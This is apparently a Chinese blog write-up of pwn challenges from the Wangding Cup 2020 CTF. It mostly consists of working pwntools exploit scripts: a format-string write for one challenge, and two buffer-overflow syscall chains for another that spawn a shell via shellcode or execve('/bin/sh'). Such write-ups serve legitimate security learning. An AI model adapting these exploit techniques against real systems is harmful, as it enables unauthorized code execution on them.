0%

网鼎杯2020白虎组的复现(pwn部分)

网鼎杯白虎组,海星,两个签到,格式化字符串和一个栈题目。剩下一个盲打,一个vivd的cve不会

of

简单的格式化字符串,没啥好说的.
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level='debug'
p = process('./of')
#p = remote('123.57.225.26',15246)
#elf = ELF('./of')
p.recvuntil('e:')
p.sendline(p32(0x804a028))
p.recvuntil('e:')
p.sendline('%34714c%20$hn')
p.recvuntil('e:')
p.sendline(p32(0x804a028))
p.recvuntil('e:')
sleep(2)
p.sendline('%35291c%20$hn')
p.interactive()

quantum_entanglement

init里有个syscall,所以就用syscall打就完事
两种解法:syscall+shellcode和syscall+execve

exp-shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context.log_level='debug'
context(arch='amd64',os='linux')
p=process('./shellcode')
rdx_rdi_rsi_syscall=0x400617
bss=0x601200
#gdb.attach(p)
#pause()
payload='a'*112+p64(bss)+p64(rdx_rdi_rsi_syscall)+p64(0x100)+p64(0)+p64(bss)+p64(bss)+p64(bss)
p.sendline(payload)
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()

exp-execve:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
context.log_level='debug'
context(arch='amd64',os='linux')
p=process('./shellcode')
main=0x40061f
rdx_rdi_rsi_syscall=0x400617
bss=0x601200
shellcode=asm(shellcraft.sh())
#gdb.attach(p)
#pause()
payload='a'*112+p64(bss)+p64(rdx_rdi_rsi_syscall)+p64(0x100)+p64(0)+p64(bss)+p64(bss)+p64(rdx_rdi_rsi_syscall)+p64(0)+p64(bss)+p64(0)
p.sendline(payload)
#pause()
payload='/bin/sh\x00'
payload=payload.ljust(58,'\x00')
p.sendline(payload)
p.interactive()

vivd

文件下载下来了,有时间去复现一波

好饿啊,早知道不学安全了